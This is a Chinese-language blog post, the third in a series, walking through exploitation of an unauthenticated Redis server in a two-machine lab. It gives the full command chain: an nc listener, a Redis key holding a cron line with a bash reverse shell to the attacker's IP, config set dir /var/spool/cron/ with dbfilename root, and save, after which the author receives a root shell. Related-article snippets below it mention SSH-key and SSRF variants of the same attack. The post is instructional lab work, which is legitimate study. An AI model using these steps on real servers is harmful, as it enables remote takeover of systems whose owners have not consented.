Redis未授权访问漏洞(三)Redis写入反弹连接定时任务

最新推荐文章于 2024-01-31 10:23:59 发布
最新推荐文章于 2024-01-31 10:23:59 发布
阅读量445 收藏 2
点赞数 1
分类专栏: 未授权漏洞集合 文章标签: redis 服务器 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/128627624
版权

前言
系列文章

Redis未授权访问漏洞(一)先导篇
Redis未授权访问漏洞(二)Webshell提权篇

Redis写入反弹连接任务

环境准备

攻击机: Centos7 IP:192.168.142.44
靶机:Centos7 IP:192.168.142.66

我们先来回顾一下corntab定时任务的一些基本命令:

在这里插入图片描述在这里插入图片描述实战实验

我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器
在这里插入图片描述这里可以看到我们已经成功用192.168.142.44的redis客户端连接了位于192.168.142.66的服务端

然后我们再打开一个终端去监听我们本地的7777端口

nc -lvp 7777

在这里插入图片描述
然后回到我们的客户端写入反弹连接的任务:

set x "\n* * * * * bash -i >& /dev/tcp/192.168.142.44/7777 0>&1\n"

修改数据文件存储路劲为 /var/spool/cron

config set dir /var/spool/cron/

修改保存的数据文件名为当前连接的服务器上当前的用户名:

config set dbfilename root

save保存

save

在这里插入图片描述我们现在查看一下当前root用户的定时文件有没有我们设置的定时任务

cd /var/spool/cron
cat root

在这里插入图片描述
可以看到定时任务写入成功

然后回到我们的监听终端,等待一分钟,收到反弹连接:
在这里插入图片描述

怰月
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Redis授权访问反弹shell
Sylon的博客
11-21 1395
0x01:前言 这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!! Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以授权访问(窃取数据、反弹sh...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权...攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器写入公钥,进而可以使用对应私钥直接登录目标服务器漏洞描述 部分 Redis
Redis - - Redis 远程代码执行漏洞
weixin_34150830的博客
12-14 474
1,利用redis漏洞远程登录服务器 1.1 登录远程 redis写入ssh公钥 [root@test ~]# redis-cli -h 192.168.168.168 -p 6379 -a 123456 # 设置路径等配置(必须有写入权限) 192.168.168.168:6379> config set dir /root/.ssh OK # 上传公钥的备份文件名字为autho...
ubuntu的redis反弹shell总结
qq_15042405的博客
02-25 1330
ubuntu的redis反弹shell总结 ubuntu要执行有点: 1、ubuntu的默认执行命令的为/bin/dash,我们使用bash -i肯定是弹不了的。 2、ubuntu计划任务运行有语法要求,redis写入的文件存在缓存数据,导致语法错误无法运行计划任务。 3、文件需要是600 rw权限,权限不对也不能运行,不过我直接写入貌似就是600 rw。 参考链接:http://www.vkxss.top/2019/05/28/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-R
ssrf,利用redis反弹shell
qq_67757718的博客
03-20 428
在docker中搭建容器,利用ssrf的漏洞攻击redis服务反弹shell
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 2720
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
Redis RCE 反弹shell 漏洞复现
06-07 1062
1 Redis简介 Redis是一个开源的使用ANSI C语言编写、支持网络、科技与内存也可以持久化的日志型、Key-Value数据库,并提供多种语言的API 环境搭建
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问服务器的人都可以尝试连接Redis。特别是...
Redis相关漏洞记录
zhang46tian的博客
04-09 4156
不是很了解Redis数据库,粗浅学了一下Redis应该是以键值对的方式存储数据的 Redis默认端口:6379 Redis相关操作 连接远程服务器redis-cli -h [目标IP] -p [端口] -a [密码] #其中redis-cli为redis远程连接的客户端 set testkey "tt" # 设置键tt的值为字符串 get tt # 获取键tt的内容 set id1 ...
redis 授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1291
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。然后直接本地开个nc。
redis 授权访问利用 两种方式
whatday的专栏
01-13 2141
1、授权访问漏洞 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。 当拿到数据库权限是不会满足我们的,我们的目标只有一个getshell! 目前较主流的两个方法,第一种定时计划反弹shell、第二种利用主从复...
利用Redis漏洞远程服务器写入定时任务
kouryoushine的博客
02-25 5618
由于近期阿里云服务器报警redis漏洞,经过调查对黑客的入侵过程进行了整理并模拟一遍,庆幸此次黑客行为对公司造成影响,同时还让我学习了很多知识,这里分享给大家。 1,被入侵的前提条件 redis没有设置密码 。 redis配置文件没有打开保护模式,并且没有bindIP地址 。 安全组设置打开了redis的6379端口。 以root用户启动redis。 有人可能会问,怎么可能这么傻,连个密码都不...
网络安全——redis授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5621
redis授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用漏洞获取目标shell
Redis授权访问漏洞
最新发布
imawuya的博客
01-31 1568
redis是完全免费开源,一个灵活的高性能key-value数据结构存储,可以用来作为数据库、缓存和消息队列。
Redis漏洞汇总
Jietewang的博客
08-11 8095
前言 redis是一个key-value存储系统,拥有很强大的功能,目前的普及率很高,reids默认端口是6379。造成为授权漏洞的原因不是逻辑漏洞(:》),是安全配置作限制的原因,如果主机非内网主机,且拥有互联网IP那么redis大概率存在授权漏洞,本人遇到的是这样的。 1.授权访问漏洞 redis默认情况是空密码连接,如果在root用户下安装的话,这是十分危险的,有多危险呢?大概( )这么危险。 ...
如何使用ssh远程编辑定时任务crontab?
weixin_34220179的博客
05-25 945
  linxu定时任务使用crontab,编辑crontab可以直接编辑:crontab -e;也可以直接读取文件 crontab file。这两种操作都不需要特殊权限sudo。区别在于,crontab -e只能登录之后界面操作;crontab file可以远程执行。   举例:ssh admin@ip 'touch file; crontab file'。或者先使用scp把file放入远程服务器...
利用redis获取权限
壊壊的诱惑你的博客
10-17 1887
0x1 前言 如果进入内网中发现了redis服务的话就美滋滋了,我们可以利用redis服务定时反弹shell、写入webshell、写入ssh公钥的操作。 0x2 Redis利用 redis:一个高性能的key-value数据库。 1. 定时任务反弹shell测试: 启动redis服务,使用telnet连接: 执行命令: set x ...
基于Redis定时任务
weixin_34044273的博客
05-26 5408
为什么80%的码农都做不了架构师?>>> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值